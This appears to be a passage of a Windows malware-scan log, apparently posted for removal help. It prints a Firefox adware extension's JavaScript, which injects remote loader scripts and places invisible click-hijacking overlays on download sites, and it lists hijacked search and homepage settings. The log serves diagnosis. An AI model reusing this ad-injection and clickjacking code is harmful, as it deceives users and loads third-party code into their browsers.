f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100, \"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens(): (0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=11910493070053587494&eid=678&pid=1&prid=316\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\"); e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}}); ;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=511181&ext=saviinshop&systemid=11910493070053587494&ext=saviinshop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=511181&ext=saviinshop&systemid=11910493070053587494&ext=saviinshop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var g=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var f=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+f.top+\"px;left:\"+f.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(g){}},f=document.createElement(\"script\"); f.type=\"text/javascript\";f[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+g.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(f)}-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),g.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",f=document.getElementById(\"r1113566095\").parentNode, f.style.position=\"relative\",f.appendChild(g))})();-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\"); if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+ \")()\";document.body.appendChild(s)}}if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")}if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"} -1<document.location.host.indexOf(\"bookbrowsee.ne\")&&new function(){for(var g=[\"adv.php?\",\"/adv.php?\"],f=0;f<document.links.length;f++)for(var h=document.links[f],k=h.pathname+h.search,m=0;m<g.length;m++)g[m]==k.substr(0,g[m].length)&&\"nofollow\"==h.rel&&\"_blank\"==h.target&&(h.setAttribute(\"onclick\",\"return false\"),h.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))}; if(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c[b]==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1)); -1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1)); -1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1)); -1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1)); -1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling)); if(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var link=document.links[i];if(\".exe\"==link.href.substr(-4)){var p=link.parentNode;p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=0;d.style.left=0;d.style.width=\"100%\";d.style.height=\"100%\";d.style.cursor=\"pointer\";d.style.zIndex=9999;p.appendChild(d)}} if(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0],b2=document.createElement(\"button\");b2.className=b.className;b2.innerHTML=b.innerHTML;b.parentNode.insertBefore(b2,b);b.parentNode.removeChild(b)}-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\"); (function(){var g=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var f=setInterval(function(){try{var h=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*h.children[2].children[1].children[1].innerText);m.push(1*h.children[2].children[2].children[1].innerText);m.push(1*h.children[3].children[1].children[1].innerText);m.push(1*h.children[3].children[2].children[1].innerText);for(var n=h=0;n<m.length;n++)h+=m[n];if(!(0<h)){clearInterval(f);var l=document.createElement(\"div\");l.style.position= \"absolute\";l.style.top=0;l.style.left=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";var q=document.getElementById(\"ucd-countdown-1-content\").children[1];q.style.position=\"relative\";q.appendChild(l)}}catch(u){try{var r=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){r+=1*jQuery(this).text()});if(0===r){clearInterval(f);var t=jQuery(\"#ucd-countdown-1-content iframe\"),v=t.parent();t.remove();v.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(w){\"undefined\"!== typeof g&&30<++g&&clearInterval(f)}}},750)}catch(h){}})(); var __intervalcountasd=0,__intervalasd=setInterval(function(){__intervalcountasd++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var g=0;g<document.links.length;g++)try{var f=document.links[g].href.toLowerCase();if(-1==f.indexOf(\"ww.ziddu.co\")&&-1==f.indexOf(\"#\")&&-1==f.indexOf(\"tunes.apple.co\")&&-1==f.indexOf(\"lay.google.co\")&&-1==f.indexOf(\"/gallery/\")){try{for(var h=document.links[g],k=0;15>=k;k++)h=h.parentNode;if(-1<h.className.indexOf(\"footerbg\"))continue}catch(m){}var n=document.links[g].parentNode; if (!(-1<n.className.indexOf(\"addthis_toolbox\"))){n.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";l.style.left=0;l.style.top=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";n.appendChild(l)}}}catch(q){}f=document.getElementsByTagName(\"iframe\");for(g=0;g<f.length;g++)try{-1==f[g].src.indexOf(\"acebook.co\")&&-1==f[g].src.indexOf(\"cp.crwdcntrl.ne\")&&(n=f[g].parentNode,n.style.position=\"relative\",l=document.createElement(\"div\"), l.style.position=\"absolute\",l.style.left=0,l.style.top=0,l.style.width=\"100%\",l.style.height=\"100%\",l.style.zIndex=\"9999\",l.style.cursor=\"pointer\",l.id=g,n.appendChild(l))}catch(u){}}20<__intervalcountasd&&clearInterval(__intervalasd)},500); new function(){if(0<location.host.toLowerCase().indexOf(\"pensubtitles.or\")){f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"728px\";f.style.height=\"90px\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";var g=document.getElementsByTagName(\"iframe\")[0].parentNode;g.insertBefore(f,document.getElementsByTagName(\"iframe\")[0]);g.style.position=\"relative\";f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"728px\";f.style.height=\"90px\";f.style.cursor= \"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";g=document.getElementsByTagName(\"iframe\")[1].parentNode;g.insertBefore(f,document.getElementsByTagName(\"iframe\")[1]);g.style.position=\"relative\";g=document.links;for(i=0;i<g.length;i++)\"Download\"==(\"undefined\"===typeof g[i].innerText?g[i].textContent:g[i].innerText)&&(f=document.createElement(\"div\"),f.style.position=\"absolute\",f.style.width=\"214px\",f.style.height=\"40px\",f.style.cursor=\"pointer\",f.style.top=\"0\",f.style.zIndex=\"2000\",p=g[i].parentNode, p.style.position=\"relative\",p.insertBefore(f,g[i]));document.getElementById(\"scrubbuad\").style.zIndex=\"15\";f=document.createElement(\"div\");f.style.zIndex=\"15000\";f.style.right=\"9px\";f.style.bottom=\"0\";f.style.position=\"fixed\";f.style.padding=\"0\";f.style.margin=\"0 0 30px 0\";f.style.width=\"220px\";f.style.height=\"72px\";f.style.overflow=\"visible\";f.style.cursor=\"pointer\";document.getElementsByTagName(\"body\")[0].firstChild.appendChild(f)}if(-1<window.location.href.indexOf(\"pensubtitles.us/opensubtitles-playe\")){g= document.getElementById(\"divPlayerDesc\");if(null!=g){g.style.position=\"relative\";var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";g.appendChild(f)}g=document.getElementById(\"divPlayerHead\");if(null!=g)for(var h=0;h<g.children.length;h++)if(\"span\"==g.children[h].tagName.toLowerCase()){var k=g.children[h],f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\"; f.style.height=\"70px\";f.style.cursor=\"pointer\";f.style.top=\"-50px\";f.style.zIndex=\"2000\";k.style.position=\"relative\";k.appendChild(f)}}}; if(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var p={},frames=document.getElementById(\"confirmbox\").getElementsByTagName(\"iframe\"),index=0;index<frames.length;index++)\"300\"==frames[index].getAttribute(\"width\")&&\"250\"==frames[index].getAttribute(\"height\")&&(p=frames[index].parentNode);p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";p.appendChild(d)} new function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==typeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var f=$(\".download\").parent();f.css(\"position\",\"relative\");var g=document.createElement(\"div\");g.style.position=\"absolute\";g.style.zIndex=\"2000\";g.style.height=\"100%\";g.style.width=\"122px\";g.style.right=\"0\";g.style.top=\"0\";g.style.cursor=\"pointer\";f.append(g);f=$(\"#addBoxX\").parent();f.css(\"position\",\"relative\");g=document.createElement(\"div\"); g.style.position=\"absolute\";g.style.zIndex=\"2000\";g.style.height=\"45px\";g.style.width=\"101px\";g.style.right=\"22px\";g.style.bottom=\"16px\";g.style.cursor=\"pointer\";f.append(g);window.__qqcount++;10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var g=document.links,f={},h={},k=0;k<g.length;k++)f=g[k].getAttribute(\"href\"),null!=f&&-1<f.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(f=g[k].getAttribute(\"id\"),null!=f&&\"addBoxX\"==f?(h=g[k].parentNode,h.style.position=\"relative\", f = document.createElement(\"div\"),f.style.position=\"absolute\",f.style.zIndex=\"2000\",f.style.height=\"45px\",f.style.width=\"101px\",f.style.right=\"22px\",f.style.bottom=\"16px\"):(h=g[k].parentNode,h.style.position=\"relative\",f=document.createElement(\"div\"),f.style.position=\"absolute\",f.style.zIndex=\"2000\",f.style.height=\"100%\",f.style.width=\"122px\",f.style.right=\"0\",f.style.top=\"0\"),f.style.cursor=\"pointer\",h.appendChild(f))}; new function(){-1<location.host.toLowerCase().indexOf(\"ulkload.co\")&&(window.___interCount=0,window.___interval=setInterval(function(){for(var g=document.getElementsByTagName(\"center\"),f=0;f<g.length;f++)if(0!=f&&!(-1<g[f].innerHTML.indexOf(\"adcopy-outer\")||-1<g[f].innerHTML.indexOf(\"btn_download\")||-1<g[f].innerHTML.indexOf(\"solvemedia puzzle widget\"))){var h=document.createElement(\"div\");h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.zIndex=\"1900\";h.style.position=\"absolute\"; f ==g.length-1?(h.style.bottom=\"0\",h.style.height=\"110px\"):h.style.top=\"0\";g[f].style.position=\"relative\";g[f].appendChild(h)}g=document.getElementById(\"cap\");null!=g&&(g.parentNode.style.position=\"relative\",g.parentNode.style.zIndex=\"2000\");20<window.___interCount++&&clearInterval(window.___interval)},500))}; new function(){if(-1<location.host.toLowerCase().indexOf(\"eehd.co\")){var g=document.createElement(\"div\");g.style.top=\"0\";g.style.width=\"100%\";g.style.height=\"100%\";g.style.cursor=\"pointer\";g.style.zIndex=\"2000\";g.style.position=\"absolute\";var f=document.getElementsByTagName(\"iframe\")[0].parentNode;f.style.position=\"relative\";f.appendChild(g);g=document.createElement(\"div\");g.style.top=\"0\";g.style.width=\"100%\";g.style.height=\"100%\";g.style.cursor=\"pointer\";g.style.zIndex=\"2000\";g.style.position=\"absolute\"; f = document.getElementById(\"preview\");f.style.position=\"relative\";f.appendChild(g)}};new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.ne\")&&(window.__intCount=0,window.__int=setInterval(function(){var g=document.getElementById(\"download-manager-checkbox\");if(null!==g)try{g.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(f){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))}; if(-1<document.location.host.indexOf(\"p3olimp.ne\")&&document.getElementsByClassName&&null!==document.getElementById(\"download-manager-checkbox\"))for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var g=document.getElementsByClassName(\"nasjfkla\"),f=0;f<g.length;f++)g[f].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var link=document.links[i],onclick=link.getAttribute(\"onclick\");if(onclick&&-1<onclick.indexOf(\"prepare_download_file\")){var div= link.parentNode;div.style.position=\"relative\";b=document.createElement(\"div\");b.className=\"nasjfkla\";b.style.position=\"absolute\";b.style.top=\"-2px\";b.style.left=\"92px\";b.style.width=\"71px\";b.style.height=\"16px\";b.style.zIndex=\"99999\";b.style.cursor=\"pointer\";div.appendChild(b)}} -1<location.host.indexOf(\"p3olimp.ne\")&&setTimeout(function(){for(var g=document.getElementById(\"leftside\"),f=0;f<g.children.length;f++)if(/\\bspnBook\\b/.test(g.children[f].className))for(var h=g.children[f].getElementsByTagName(\"a\"),k=0;k<h.length;k++)h[k].setAttribute(\"href\",\"#\"),h[k].setAttribute(\"target\",\"\")},1E3); new function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var g=document.getElementsByTagName(\"center\"),f=0;f<g.length;f++){var h=g[f].firstChild;\"undefined\"!==typeof h.tagName&&\"a\"==h.tagName.toLowerCase()&&(g[f].style.position=\"relative\",h=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.top=\"0\",h.style.left=\"0\",h.style.width=\"100%\",h.style.height=\"100%\",h.style.zIndex=\"2000\",h.style.cursor=\"pointer\",g[f].appendChild(h))}}; new function(){if(window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var g=document.getElementsByTagName(\"img\"),f=0;f<g.length;f++)if(-1<g[f].getAttribute(\"src\").indexOf(\"baixatudo.png\")){var h=document.createElement(\"div\");h.style.width=\"100%\";h.style.height=\"100%\";h.style.position=\"absolute\";h.style.zIndex=\"9999\";h.style.top=\"0\";h.style.cursor=\"pointer\";var k=g[f].parentNode.parentNode;k.style.position=\"relative\";k.appendChild(h)}}; new function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Descargar Subt\\u00edtulo\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";var h=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}}; new function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Download Subtitle\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";var h=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}}; new function(){if(0<location.host.toLowerCase().indexOf(\"egendasbrasil.or\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Baixar Legenda\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";var h=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}}; new function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var g=document.getElementsByTagName(\"a\"),f=0;f<g.length;f++){var h=\"undefined\"===typeof g[f].innerText?g[f].textContent:g[f].innerText,h=h.trim();if(\"Download\"===h||0==h.indexOf(\"Direct\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor= \"pointer\";var m=g[f].parentNode;m.style.position=\"relative\";m.appendChild(k);0==h.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))}; new function(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var g=document.getElementsByTagName(\"iframe\"),f=0;f<g.length;f++){var h=g[f].parentNode;if(null!=h){var k=h.getAttribute(\"class\");null!=k&&-1<k.indexOf(\"banner-body\")&&(k=document.createElement(\"div\"),k.style.width=\"100%\",k.style.height=\"100%\",k.style.position=\"absolute\",k.style.zIndex=\"9999\",k.style.top=\"0\",k.style.cursor=\"pointer\",h.style.position=\"relative\",h.appendChild(k))}}};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=511181&ext=saviinshop&systemid=11910493070053587494&ext=saviinshop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//api.jollywallet.com/affiliate/client?dist=87&sub=pnd&name=saviinshop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try {new function() {if (document.getElementById(\"id_a92246ee8f90930c\") == null&& window.self == window.top) {var script = document.createElement(\"script\");script.type = \"text/javascript\";script.src = \"https://interyield.jmp9.com/InterYield/bindevent.do?e=click&affiliate=wpop&subid=678_1&ecpm=0 &debug=false&snoozeMinutes=3&adCountIntervalHours=24&maxAdCountsPerInterval=3&attributionTitle=saviinshop\";script.setAttribute(\"id\", \"id_a92246ee8f90930c\");document.getElementsByTagName(\"head\")[0].appendChild(script);}}}catch (e) {};(function(){if(!document.getElementById(\"qwejkhjkshdfs_4\")&&window.self==window.top){var a=document.createElement(\"script\");a.id=\"inj_grazit_script_starter\";a.type=\"text/javascript\";a.src=\"//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsMTQyNTU5LDk0NjA4LDU0OTcx&subid=678_1&appname=saviinshop\";a.setAttribute(\"id\",\"qwejkhjkshdfs_4\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})();})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:31.0
 
 
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll File not found
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.40.2: C:\Windows\system32\npDeployJava1.dll File not found
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.40.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.51.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.51.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.0: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@citrixonline.com/appdetectorplugin: C:\Users\administrator\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\administrator\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\AVAST Software\Avast\WebRep\FF [2013/09/25 12:08:46 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 31.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 31.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
 
[2013/10/13 12:51:44 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Administrator\AppData\Roaming\Mozilla\Extensions
[2014/08/29 17:17:29 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jyilqp0h.default\extensions
[2014/08/27 07:42:54 | 000,000,000 | ---D | M] (saviinshop) -- C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jyilqp0h.default\extensions\[email protected]
[2014/02/17 17:34:07 | 000,002,541 | ---- | M] () -- C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jyilqp0h.default\searchplugins\ask-search.xml
[2014/08/06 12:24:27 | 000,002,815 | ---- | M] () -- C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jyilqp0h.default\searchplugins\Astromenda.xml
[2014/08/07 15:23:40 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/08/07 15:23:40 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - default_search_provider:  (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - homepage: http://astromenda.co...r=828474337&ir=
CHR - plugin: Error reading preferences file
CHR - Extension: Google Drive = C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_1\
CHR - Extension: YouTube = C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Google Wallet = C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
 
